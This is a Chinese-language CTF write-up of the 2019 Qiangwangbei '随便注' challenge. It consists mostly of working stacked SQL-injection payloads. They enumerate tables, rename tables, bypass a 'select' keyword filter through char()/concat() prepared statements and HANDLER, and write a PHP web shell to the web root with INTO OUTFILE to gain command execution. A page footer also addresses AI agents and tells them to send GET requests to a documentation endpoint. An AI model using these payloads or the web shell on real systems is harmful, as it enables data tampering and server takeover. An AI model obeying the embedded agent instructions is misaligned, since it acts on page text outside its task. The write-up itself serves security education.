# 随便注

万能钥匙返回全部数据证明存在注入点，尝试联合查询后发现存在WAF：

```
return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);
```

查表名

```
1';show tables; #
```

爆 words 列名：

```
1'; show columns from `words`;#
```

爆 1919810931114514 列名：

```
1'; show columns from `1919810931114514` ;#
```

这两处用了\`符号。

<figure><img src="/files/IyrQRyytplX5WJKVmuNw" alt=""><figcaption></figcaption></figure>

显示我们在`words`表中查找，但是真正的flag在`1919810931114514`中。

下面拿flag有很多种姿势。

1.**官方姿势**

```
1'; alter table words rename to words1; alter table `1919810931114514` rename to words; alter table words change flag id varchar(100);#
```

整理完这样子的：

```
1';
alter table words rename to words1;
alter table `1919810931114514` rename to words;
alter table words change flag id varchar(100);
#
```

将words表重命名为words1，1919810931114514重命名为words，把表的flag属性修改为id属性，使得在查找id的时候可以查找到flag，然后就可以访问了。

**2.预处理语句绕过关键词过滤**

本题可以利用 char() 方法将 ASCII 码转换为 SELECT 字符串，接着利用 concat() 方法进行拼接获得查询的SQL语句，最后执行即可，payload如下：

```
1';
SET @sql=concat(char(115,101,108,101,99,116)," * from `1919810931114514`");
PREPARE sqla from @sql;
EXECUTE sqla;
#
```

或者不用char()方法，直接将字符串相加也可以绕过限制：

```
-1';
SET @sql = CONCAT('se','lect * from `1919810931114514`;');
PREPARE sqla from @sql;
EXECUTE sqla;
#
```

**3.RCE**

报错注入后可以看见用户为root，直接上马拿权限。

先上马：

```
1';
Set @sql=concat("s","elect '<?php @print_r(`$_GET[oatmeal]`);?>' into outfile '/var/www/html/1",char(46),"php'");
PREPARE sqla from @sql;
EXECUTE sqla;
#
```

RCE：

```
/1.php?oatmeal=mysql -uroot -proot -e"use supersqli;select flag from \`1919810931114514\`;"
```

读flag。

**4.handler**

handler代替select进行查询。

```
1'; 
handler `1919810931114514` open as oatmeal; 
handler oatmeal read first; 
handler oatmeal close;#
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gitbook-88.gitbook.io/ctf-writeup/2019/2019-qiang-wang-bei/sui-bian-zhu.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.